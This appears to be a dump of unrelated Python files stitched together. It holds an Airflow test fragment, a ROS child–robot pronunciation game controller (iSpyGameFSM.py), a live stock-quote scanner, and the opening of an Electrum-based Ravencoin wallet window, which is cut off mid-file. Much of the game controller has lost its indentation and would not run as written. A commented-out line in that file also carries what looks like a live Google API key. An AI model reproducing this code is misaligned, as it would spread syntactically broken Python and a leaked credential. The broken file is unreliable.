        with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
            del os.environ["TEST_NOT_EXISTS"]

            assert "BEFORE" == os.environ["TEST_EXISTS"]
            assert "TEST_NOT_EXISTS" not in os.environ

            with suppress(AirflowException):
                with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
                    assert "AFTER" == os.environ["TEST_NOT_EXISTS"]
                    assert "AFTER" == os.environ["TEST_EXISTS"]
                    raise AirflowException("Unknown exception")

            assert "BEFORE" == os.environ["TEST_EXISTS"]
            assert "TEST_NOT_EXISTS" not in os.environ
class TestCheckIfPidfileProcessIsRunning(unittest.TestCase):
    """Tests for check_if_pidfile_process_is_running()."""

    def test_ok_if_no_file(self):
        """A missing pid file is not an error."""
        check_if_pidfile_process_is_running('some/pid/file', process_name="test")

    def test_remove_if_no_process(self):
        """A pid file pointing at a nonexistent PID gets deleted."""
        # Assert file is deleted: NamedTemporaryFile's own cleanup then fails.
        with pytest.raises(FileNotFoundError):
            with NamedTemporaryFile('+w') as f:
                # PID far beyond any real pid_max, so no such process exists.
                f.write('19191919191919191991')
                f.flush()
                check_if_pidfile_process_is_running(f.name, process_name="test")

    def test_raise_error_if_process_is_running(self):
        """A pid file pointing at a live PID (our own) raises AirflowException."""
        pid = os.getpid()
        with NamedTemporaryFile('+w') as f:
            f.write(str(pid))
            f.flush()
            with pytest.raises(AirflowException, match="is already running under PID"):
                check_if_pidfile_process_is_running(f.name, process_name="test")
|
iSpyGameFSM.py |
"""
This is a basic class for the Game Controller
"""
import json
import time
from GameUtils.AudioRecorder import AudioRecorder
from .iSpyTaskController import iSpyTaskController
import rospy
import _thread as thread
# -*- coding: utf-8 -*-
# pylint: disable=import-error
from transitions import Machine
import threading
# from GameUtils import Curriculum
from GameUtils import GlobalSettings
from GameUtils.GlobalSettings import iSpyGameStates as gs
from GameUtils.GlobalSettings import iSpyRobotInteractionStates as ris
from GameUtils.PronunciationUtils.PronunciationUtils import PronunciationUtils
from .ROSNodeMgr import ROSNodeMgr
from .iSpyDataTracking import iSpyDataTracking
#from .StudentModel import StudentModel
from .RobotBehaviorList.RobotBehaviorList import RobotBehaviors
from .RobotBehaviorList.RobotBehaviorList import RobotRoles
from .RobotBehaviorList.RobotBehaviorList import RobotRolesBehaviorsMap
from .AffdexAnalysis.node_AffdexResponse import AffdexAnalysis
from .RoleSwitchingPrj.ChildRobotInteractionFSM import ChildRobotInteractionFSM
from .GameModeFSMs import AlwaysMissionModeFSM,CompleteModeFSM,AlwaysExploreModeFSM
from multiprocessing import Process
import datetime
# from StudentModel import StudentModel
if GlobalSettings.USE_ROS:
from std_msgs.msg import Header # standard ROS msg header
from std_msgs.msg import String
from unity_game_msgs.msg import iSpyCommand
from unity_game_msgs.msg import iSpyAction
else:
pass
# TapGameLog = GlobalSettings.TapGameLog #Mock ob-ject, used for testing in non-ROS environments
# TapGameCommand = GlobalSettings.TapGameCommand
# Recording time constant (ms) for child speech capture.
RECORD_TIME_MS = 3500

# COMMAND CONSTANTS: opcodes sent to the Unity game via iSpyCommand.
RESET = 0
SHOW_PRONOUNCIATION_PANEL = 1
SHOW_OBJECT_DESCR_PANEL = 2
ROBOT_EXPERT_ROLE = 3
SEND_PRONOUNCIATION_ACCURACY_TO_UNITY = 10
SEND_TASKS_TO_UNITY = 20
GAME_FINISHED = 99
BUTTON_DISABLED=31
TASK_COMPLETED = 32
# NOTE(review): SHOW_PRONOUNCIATION_PANEL appears twice in this list — the
# second occurrence looks like a copy-paste slip (SHOW_OBJECT_DESCR_PANEL
# perhaps intended); TASK_COMPLETED and SET_GAME_SCENE are also absent even
# though both are sent elsewhere in this file. Verify against the consumer
# of this list before changing it.
VALID_ISPY_COMMANDS = [RESET, SHOW_PRONOUNCIATION_PANEL, SHOW_PRONOUNCIATION_PANEL, SEND_PRONOUNCIATION_ACCURACY_TO_UNITY, SEND_TASKS_TO_UNITY, GAME_FINISHED,BUTTON_DISABLED]
SET_GAME_SCENE = 34
class iSpyGameFSM: # pylint: disable=no-member
"""
Receives and sends out ROS messages.
"""
    def __init__(self,participant_id, experimenter, session_number):
        """Wire up ROS, the task controller, the child-robot interaction FSM,
        and data tracking for one study session.

        participant_id / experimenter / session_number identify the session;
        session_number may be the string "practice".
        """
        self.ros_node_mgr = ROSNodeMgr()
        self.ros_node_mgr.init_ros_node()
        self.session_number = session_number
        # Keeps track of the word the child is supposed to say
        self.origText = ""
        # check whether the clicked object is a target object
        self.correct_obj = False
        # The object of the iSpyAudioRecorder Class (created lazily elsewhere)
        self.recorder = None
        # Publisher to the ROS_TO_ISPY_GAME_TOPIC
        self.game_commander = None
        # Bool telling if the cmd message was heard from Unity
        self.ros_node_mgr.message_received = False
        self.task_controller = iSpyTaskController(session_number)
        self.results_handler = PronunciationUtils()
        self.interaction = ChildRobotInteractionFSM(self.ros_node_mgr,self.task_controller,self, participant_id,session_number)
        self.iSpyDataTracking = iSpyDataTracking(self.interaction,self.ros_node_mgr, participant_id, experimenter, session_number)
        # Bool stating whether or not the current mission is completed
        self.mission_completed = True
        # choose which game FSM to call
        # AlwaysMissionModeFSM(self.ros_node_mgr) # CompleteModeFSM() # AlwaysExploreModeFSM(self.ros_node_mgr)
        self.FSM = AlwaysMissionModeFSM(self.ros_node_mgr,session_number)
        # Facial-affect (Affdex) analysis is skipped during practice sessions.
        if session_number != "practice":
            self.affdexAnalysis = AffdexAnalysis(self,self.ros_node_mgr,participant_id,experimenter, session_number)
        self.kill_received = False # for stopping the update() thread
        self.current_task_index = 0
        # start a thread to check the game update (currently disabled)
        #self.t = threading.Thread(target=self.update)
        #self.t.start()
    def update(self):
        """Background poll loop (not started — see the commented-out thread in
        __init__): stops child-interaction tracking whenever the game leaves
        mission mode or it is not the child's turn / child-help phase.

        NOTE(review): no sleep in the loop, so if started it would busy-spin;
        the trailing kill_received check duplicates the while condition.
        """
        while self.kill_received == False:
            if self.FSM.state != gs.MISSION_MODE:
                self.iSpyDataTracking.stop_tracking_child_interaction()
            if self.interaction.state != ris.CHILD_TURN and self.interaction.state != ris.ROBOT_TURN+'_'+ris.CHILD_HELP:
                self.iSpyDataTracking.stop_tracking_child_interaction()
            if self.kill_received == True:
                break
    def _reach_max_task_time(self): # if the condition is in "fixed novice": set a max elapsed time
        """Cap how long a task may run (only in the "novice" condition):
        reset the task controller for a new task after ~4.5 minutes with at
        most 2 words finished, or ~6.5 minutes with at most 3.
        """
        # Applies only when subj_cond == "novice"; everyone else is uncapped.
        if self.interaction.subj_cond != "novice": return
        max_elapsed_time = datetime.timedelta(seconds=4.5*60) # 4.5 minutes (earlier comment said 5)
        max_elapsed_time2 = datetime.timedelta(seconds=6.5*60) # 6.5 minutes
        if datetime.datetime.now() - self.task_controller.get_task_time()['start'] > max_elapsed_time:
            if self.task_controller.num_finished_words <= 2: self.task_controller.reset_for_new_task()
        if datetime.datetime.now() - self.task_controller.get_task_time()['start'] > max_elapsed_time2:
            if self.task_controller.num_finished_words <= 3: self.task_controller.reset_for_new_task()
    def on_ispy_state_info_received(self,transition_msg):
        """
        Rospy Callback for when we get log messages from ispy game
        (transition_msg.data is the name of a game FSM trigger).
        """
        def check_task_completion():
            # Once the controller reports no task in progress, the task just
            # finished: tell Unity and start the end-of-task robot behavior.
            if not self.task_controller.task_in_progress:
                # let the game knows the task is completed
                self.ros_node_mgr.send_ispy_cmd(TASK_COMPLETED)
                self.current_task_index += 1
                if self.current_task_index != 0:
                    action_number = self.current_task_index
                    self.interaction.start_task_end_behavior(action_number)
        #print("State Transition: "+transition_msg.data)
        # Ignore anything that is not a known trigger.
        if transition_msg.data in gs.Triggers.triggers:
            #time.sleep(.1)
            if self.FSM.state != gs.EXPLORATION_MODE and self.FSM.state != gs.WORD_DISPLAY: # outside explore/word-display modes
                self.interaction.react(transition_msg.data,self.origText) # the robot reacts
            if transition_msg.data == gs.Triggers.TOPLEFT_BUTTON_PRESSED:
                # Mission started: stamp the turn start time and launch the task.
                self.iSpyDataTracking.start_stopwatch()
                self.interaction.turn_start_time = datetime.datetime.now()
                self._run_game_task()
            elif transition_msg.data == gs.Triggers.CONNECT_BUTTON_PRESSED:
                # NOTE(review): magic number — 34 is SET_GAME_SCENE, defined
                # at module level; consider using the constant here.
                self.ros_node_mgr.send_ispy_cmd(34, self.session_number) #SET_GAME_SCNE = 34
                print("CONNECT_BUTTON_PRESSED : "+self.session_number)
                self.ros_node_mgr.send_robot_cmd(RobotBehaviors.ROBOT_HAPPY_DANCE)
            elif transition_msg.data == gs.Triggers.HINT_BUTTON_PRESSED:
                self.interaction.numHintButtonPressedForTask += 1
            elif transition_msg.data == gs.Triggers.OBJECT_CLICKED:
                pass
            elif transition_msg.data == gs.Triggers.NONTARGET_OBJECT_COLLECTED or transition_msg.data == gs.Triggers.TARGET_OBJECT_COLLECTED:
                # Any collection ends a turn: enforce the task time cap,
                # check for completion, then hand the turn over.
                self._reach_max_task_time()
                check_task_completion()
                self.interaction.turn_taking()
            # elif transition_msg.data == gs.Triggers.TARGET_OBJECT_COLLECTED:
            # 	self._reach_max_task_time()
            # 	check_task_completion()
            # 	self.interaction.turn_taking()
            elif transition_msg.data == gs.Triggers.PRONUNCIATION_PANEL_CLOSED:
                if self.interaction.state == ris.CHILD_TURN: # when a new turn is child's, then start tracking the child's interaction
                    t = threading.Timer(3.0, self.interaction.start_tracking_child_interaction).start() # checking for timeout
            elif transition_msg.data == gs.Triggers.SCREEN_MOVED:
                self.interaction.stop_tracking_child_interaction()
            # If the message is in gs.Triggers, then allow the trigger
            # (SCREEN_MOVED is handled above and deliberately not forwarded).
            if transition_msg.data != gs.Triggers.SCREEN_MOVED:
                self.FSM.start_trigger(transition_msg.data)
#################################################################################################
def on_ispy_log_received(self, log_msg):
    """Rospy callback for log messages from the game.

    A "messageReceived" ack tells the publishing loop it can stop resending.
    """
    # If the the message was "messageReceived", that means that the publishing loop can stop
    if log_msg.data == "messageReceived":
        self.ros_node_mgr.message_received = True
#################################################################################################
def on_ispy_action_received(self, ispy_action_msg):
    """
    Rospy callback for raw touch/drag/speech actions from the Unity game.

    Extracts the clicked object's word, updates the audio-recording state,
    runs pronunciation analysis, and mirrors the touch flags onto self
    before republishing interaction data.
    """
    if self.FSM.state == gs.EXPLORATION_MODE or self.FSM.state == gs.WORD_DISPLAY:
        # if the game is still in explore mode
        return
    time.sleep(0.1) # wait for on_ispy_state_info_received() to finish and FSM to transition first
    #self.interaction.stop_tracking_child_interaction() # start tracking the elapsed time of child's lack of tablet interaction
    self.iSpyDataTracking.on_ispy_action_received(ispy_action_msg)
    def speakingStage(stage):
        # Count start/end events; a completed recording is a pair, which
        # _speechace_analysis detects via has_recorded % 2 == 0.
        if stage == "speakingStart":
            self.recorder.has_recorded += 1
            # self.recorder.start_recording(self.origText, RECORD_TIME_MS, self.interaction.state)
            # #TODO: Update 'test' to actual word
        elif stage == "speakingEnd":
            self.recorder.has_recorded += 1
            # self.recorder.stop_recording()
    def msg_evaluator(ispy_action_msg):
        """Calls the respective functions for each part of the action msg
        """
        #Removes object position from ispy_action_msg
        if ispy_action_msg.clickedObjectName != "":
            # Object names look like "<word>-<position>"; keep only the
            # part before the first dash.
            object_name = ""
            for letter in ispy_action_msg.clickedObjectName:
                if letter == "-":
                    break
                object_name += letter
            self.origText = object_name
        #Initializes a new audio recorder object if one hasn't been created
        if self.recorder == None: self.recorder = AudioRecorder()
        speakingStage(ispy_action_msg.speakingStage)
    print("\n")
    # Evaluates the action message
    msg_evaluator(ispy_action_msg)
    self._speechace_analysis()
    if self.interaction.state == ris.CHILD_TURN or self.interaction.state == ris.ROBOT_TURN+'_'+ris.CHILD_HELP:
        pass
        # if self.FSM.state == gs.MISSION_MODE:
        # threading.Timer(0.5, self.interaction.start_tracking_child_interaction).start() # start tracking the elapsed time of child's lack of tablet interaction
    # Mirror raw touch flags for downstream consumers.
    self.isDragging = ispy_action_msg.isDragging
    self.pointerClick = ispy_action_msg.pointerClick
    self.onPinch = ispy_action_msg.onPinch
    self.isScalingUp = ispy_action_msg.isScalingUp
    self.isScalingDown = ispy_action_msg.isScalingDown
    self.interaction._ros_publish_data("","", True)
def _speechace_analysis(self):
'''
speech ace analysis
'''
print("+++++speech analay: {}".format(self.origText))
# If given a word to evaluate and done recording send the information to speechace
if self.origText and self.recorder.has_recorded % 2 == 0 and self.recorder.has_recorded != 0:
# If you couldn't find the android audio topic, automatically pass
# instead of using the last audio recording
print("clicked object is: "+self.origText)
self.correct_obj = self.task_controller.isTarget(self.origText)
letters = list(self.origText)
passed = ['1'] * len(letters)
print("NO RECORDING SO YOU AUTOMATICALLY PASS")
# TODO: Delete if we are not planning on using SpeechAce as real-time source of game info
# if not self.recorder.valid_recording:
# letters = list(self.origText)
# passed = ['1'] * len(letters)
# print ("NO RECORDING SO YOU AUTOMATICALLY PASS")
# else:AIzaSyDK8tFh08NPXRotdeOmSuTd8hzczxms7nY
# audioFile = self.recorder.WAV_OUTPUT_FILENAME_PREFIX + self.origText + '.wav'
# word_score_list = self.recorder.speechace(audioFile)
#
# if word_score_list:
# for word in word_score_list:
# letters, passed = self.results_handler.process_speechace_word_results(word)
#
# else:
# letters = list(self.origText)
# passed = ['1'] * len(letters)
# print ("NO, RECORDING SO YOU AUTOMATICALLY PASS")
results_params = {}
results_params["letters"] = letters
results_params["passed"] = passed
# Checks each letter and if one letter is False then the word is not perfectly said
perfect_word = True
for i in passed:
if i == '0':
perfect_word = False
break
# If the word was pronounced perfectly then reset origText
if perfect_word:
if self.task_controller.isTarget(self.origText):
self.task_controller.update_target_list(self.origText)
self.origText = ""
#print(results_params)
self.ros_node_mgr.send_ispy_cmd(SEND_PRONOUNCIATION_ACCURACY_TO_UNITY, results_params)
self.recorder.has_recorded = 0
def _run_game_task(self):
# When entering mission mode from exploration mode, get a random task
# and send it to Unity
if self.task_controller.task_in_progress == False:
task = self.task_controller.get_next_task()
# If there are no more available quests, you won the game
if task == None:
self.ros_node_mgr.send_ispy_cmd(GAME_FINISHED)
self.interaction.child_states.done()
else:
self.ros_node_mgr.send_ispy_cmd(SEND_TASKS_TO_UNITY, task)
self.interaction.reset_turn_taking()
self.interaction.get_robot_general_response()
t = threading.Timer(3.0,self.interaction.start_tracking_child_interaction).start()
threading.Timer(10.0, self.interaction.on_child_max_elapsed_time).start()
|
quoteScanner.py | # -*- coding: utf-8 -*-
import threading, time
import click
import pandas as pd
from nseta.live.live import get_quote, get_live_quote, get_data_list
from nseta.scanner.baseScanner import baseScanner
from nseta.common.tradingtime import IST_datetime
from nseta.resources.resources import resources
from nseta.archives.archiver import *
from nseta.common.log import tracelog, default_logger
from nseta.common.commons import human_readable_df
__all__ = ['quoteScanner']
NAME_LIST = ['Symbol', 'Name', 'ISIN']
QUOTE_LIST = ['Last Updated', 'Prev Close', 'Last Trade Price','Change','% Change', 'Avg. Price', 'Upper Band','Lower Band', 'Adjusted Price']
OHLC_LIST = ['Open', 'High', 'Low', 'Close']
WK52_LIST = ['52 Wk High', '52 Wk Low']
VOLUME_LIST = ['Quantity Traded', 'Total Traded Volume', 'Total Traded Value', 'Delivery Volume', '% Delivery', 'Total Buy Qty.', 'Total Sell Qty.', 'FF Market Cap(cr)', 'Face Value', 'Buy - Sell', 'Free Float']
PIPELINE_LIST = ['Bid Quantity', 'Bid Price', 'Offer_Quantity', 'Offer_Price']
class quoteScanner(baseScanner):
    """Scanner that fetches a live quote for a symbol and renders it as
    aligned text tables, optionally refreshing in a background thread."""

    def __init__(self, scanner_type, stocks=None, indicator=None, background=False):
        # Bug fix: `stocks` previously defaulted to a shared mutable list
        # (`stocks=[]`); use None as the sentinel and build a fresh list.
        super().__init__(scanner_type, stocks if stocks is not None else [], indicator, background)
        self.response_type = ResponseType.Quote

    @tracelog
    def scan(self, symbol, general, ohlc, wk52, volume, orderbook, background):
        """Fetch and print the live quote for *symbol*.

        When *background* is truthy, runs the refresh loop on a daemon
        thread (and blocks on it); otherwise fetches once.
        """
        global RUN_IN_BACKGROUND
        try:
            if background:
                b = threading.Thread(name='live_quote_background',
                                     target=self.live_quote_background,
                                     args=[symbol, general, ohlc, wk52, volume, orderbook],
                                     daemon=True)
                b.start()
                b.join()
            else:
                orgdata, df = get_live_quote(symbol, general, ohlc, wk52, volume, orderbook)
                self.format_beautified(orgdata, general, ohlc, wk52, volume, orderbook)
        except Exception as e:
            RUN_IN_BACKGROUND = False
            default_logger().debug(e, exc_info=True)
            click.secho('Failed to fetch live quote', fg='red', nl=True)
            return
        except SystemExit:
            # Ctrl-C / sys.exit while scanning: stop the loop quietly.
            RUN_IN_BACKGROUND = False
            return

    @tracelog
    def live_quote_background(self, symbol, general, ohlc, wk52, volume, orderbook, terminate_after_iter=0, wait_time=resources.scanner().background_scan_frequency_quotes):
        """Poll and print the live quote every *wait_time* seconds.

        Runs until the global RUN_IN_BACKGROUND flag is cleared, or until
        *terminate_after_iter* iterations when that is > 0. Returns the
        number of iterations performed.
        """
        global RUN_IN_BACKGROUND
        RUN_IN_BACKGROUND = True
        iteration = 0
        while RUN_IN_BACKGROUND:
            iteration = iteration + 1
            if terminate_after_iter > 0 and iteration >= terminate_after_iter:
                RUN_IN_BACKGROUND = False
                break
            result = get_quote(symbol)
            self.format_beautified(result, general, ohlc, wk52, volume, orderbook)
            time.sleep(wait_time)
        click.secho('Finished all iterations of scanning live quotes.', fg='green', nl=True)
        return iteration

    def format_beautified(self, orgdata, general, ohlc, wk52, volume, orderbook):
        """Print the selected sections of a quote payload as aligned tables."""
        primary, name_data, quote_data, ohlc_data, wk52_data, volume_data, pipeline_data = get_data_list(orgdata)
        frames = []
        if general:
            frames = self.add_frame(frames, name_data, NAME_LIST)
        frames = self.add_frame(frames, quote_data, QUOTE_LIST)
        if ohlc:
            frames = self.add_frame(frames, ohlc_data, OHLC_LIST)
        if wk52:
            frames = self.add_frame(frames, wk52_data, WK52_LIST)
        if volume:
            frames = self.add_frame(frames, volume_data, VOLUME_LIST)
        click.secho('------------------------------------------', fg='green', nl=True)
        print('As of {}\n'.format(IST_datetime()))
        click.echo(pd.concat(frames).to_string(index=True))
        if orderbook:
            dfpipeline = self.formatted_dataframe(pipeline_data, PIPELINE_LIST, indices=False)
            print('\n')
            click.echo(dfpipeline.to_string(index=False))
        click.secho('------------------------------------------', fg='red', nl=True)

    def format_column(self, columnname, width):
        """Left-justify *columnname* to *width* and append a '|' separator."""
        return columnname.ljust(width) + '|'

    def add_frame(self, frames, list_data, column_names, should_transpose=True):
        """Append *list_data* (formatted and humanized) to *frames* and return it."""
        df = self.formatted_dataframe(list_data, column_names)
        df = human_readable_df(df)
        frames.append(df.transpose() if should_transpose else df)
        return frames

    def formatted_dataframe(self, list_data, column_names, indices=True):
        """Build a DataFrame from *list_data* with padded column headers."""
        columns = [self.format_column(column, 20) for column in column_names]
        if indices:
            df = pd.DataFrame(list_data, columns=columns, index=[''])
        else:
            df = pd.DataFrame(list_data, columns=columns)
        return df
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, ravencoin, commands,
coinchooser, paymentrequest)
from electrum.ravencoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidRavencoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
    """Flat 25x25 icon button used in the status bar.

    Wraps a plain callable so it can be triggered by click or keyboard.
    """

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25, 25))
        self.setCursor(QCursor(Qt.PointingHandCursor))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        # Fix: accept the numpad Enter key (Qt.Key_Enter) as well as the
        # main Return key — previously only Key_Return triggered the action.
        if e.key() in (Qt.Key_Return, Qt.Key_Enter):
            self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
    """Build the main wallet window.

    Wires up window state, unit/config settings, all tabs, menus and
    shortcuts, network callbacks, and the optional update-check thread.
    Order matters: status bar and tabs must exist before load_wallet()
    and the network callbacks run.
    """
    QMainWindow.__init__(self)
    self.gui_object = gui_object
    self.config = config = gui_object.config  # type: SimpleConfig
    self.gui_thread = gui_object.gui_thread
    self.setup_exception_hook()
    self.network = gui_object.daemon.network  # type: Network
    assert wallet, "no wallet"
    self.wallet = wallet
    self.fx = gui_object.daemon.fx  # type: FxThread
    self.invoices = wallet.invoices
    self.contacts = wallet.contacts
    self.tray = gui_object.tray
    self.app = gui_object.app
    self.cleaned_up = False
    self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
    self.checking_accounts = False
    self.qr_window = None
    self.not_enough_funds = False
    self.pluginsdialog = None
    self.require_fee_update = False
    self.tl_windows = []  # stack of modal-ish top-level windows (see push_top_level_window)
    self.tx_external_keypairs = {}
    Logger.__init__(self)
    self.tx_notification_queue = queue.Queue()
    self.tx_notification_last_time = 0
    self.create_status_bar()
    self.need_update = threading.Event()
    # Display-unit settings; fall back to the default if the stored
    # decimal point doesn't map to a known base unit.
    self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
    try:
        decimal_point_to_base_unit_name(self.decimal_point)
    except UnknownBaseUnit:
        self.decimal_point = DECIMAL_POINT_DEFAULT
    self.num_zeros = int(config.get('num_zeros', 1))
    self.asset_blacklist = config.get('asset_blacklist', [])
    self.asset_whitelist = config.get('asset_whitelist', [])
    self.completions = QStringListModel()
    # Build all tabs; the first four are always visible.
    self.tabs = tabs = QTabWidget(self)
    self.send_tab = self.create_send_tab()
    self.receive_tab = self.create_receive_tab()
    self.addresses_tab = self.create_addresses_tab()
    self.assets_tab = self.create_assets_tab()
    self.utxo_tab = self.create_utxo_tab()
    self.console_tab = self.create_console_tab()
    self.contacts_tab = self.create_contacts_tab()
    tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
    tabs.addTab(self.assets_tab, read_QIcon("tab_assets.png"), _('Assets'))
    tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
    tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
    def add_optional_tab(tabs, tab, icon, description, name):
        # Remember tab metadata so toggle_tab() can re-insert it in order.
        tab.tab_icon = icon
        tab.tab_description = description
        tab.tab_pos = len(tabs)
        tab.tab_name = name
        if self.config.get('show_{}_tab'.format(name), False):
            tabs.addTab(tab, icon, description.replace("&", ""))
    add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
    add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
    add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
    add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
    tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
    self.setCentralWidget(tabs)
    if self.config.get("is_maximized", False):
        self.showMaximized()
    self.setWindowIcon(read_QIcon("electrum.png"))
    self.init_menubar()
    # weakref proxy so the shortcut lambdas don't keep the tabs alive
    wrtabs = weakref.proxy(tabs)
    QShortcut(QKeySequence("Ctrl+W"), self, self.close)
    QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
    QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
    QShortcut(QKeySequence("F5"), self, self.update_wallet)
    QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
    QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
    for i in range(wrtabs.count()):
        # i=i binds the loop variable early (late-binding closure pitfall)
        QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
    self.payment_request_ok_signal.connect(self.payment_request_ok)
    self.payment_request_error_signal.connect(self.payment_request_error)
    self.history_list.setFocus(True)
    # network callbacks
    if self.network:
        self.network_signal.connect(self.on_network_qt)
        interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                     'new_transaction', 'status',
                     'banner', 'verified', 'fee', 'fee_histogram']
        # To avoid leaking references to "self" that prevent the
        # window from being GC-ed when closed, callbacks should be
        # methods of this class only, and specifically not be
        # partials, lambdas or methods of subobjects. Hence...
        self.network.register_callback(self.on_network, interests)
        # set initial message
        self.console.showMessage(self.network.banner)
        self.network.register_callback(self.on_quotes, ['on_quotes'])
        self.network.register_callback(self.on_history, ['on_history'])
        self.new_fx_quotes_signal.connect(self.on_fx_quotes)
        self.new_fx_history_signal.connect(self.on_fx_history)
    # update fee slider in case we missed the callback
    self.fee_slider.update()
    self.load_wallet(wallet)
    gui_object.timer.timeout.connect(self.timer_actions)
    self.fetch_alias()
    # If the option hasn't been set yet
    if config.get('check_updates') is None:
        choice = self.question(title="Electrum - " + _("Enable update check"),
                               msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                   _("Would you like to be notified when there is a newer version of Electrum available?"))
        config.set_key('check_updates', bool(choice), save=True)
    if config.get('check_updates', False):
        # The references to both the thread and the window need to be stored somewhere
        # to prevent GC from getting in our way.
        def on_version_received(v):
            if UpdateCheck.is_newer(v):
                self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                self.update_check_button.show()
        self._update_check_thread = UpdateCheckThread(self)
        self._update_check_thread.checked.connect(on_version_received)
        self._update_check_thread.start()
def on_history(self, b):
    """Network-thread callback for 'on_history': invalidate the coin price
    cache and hand off to the GUI thread via the signal."""
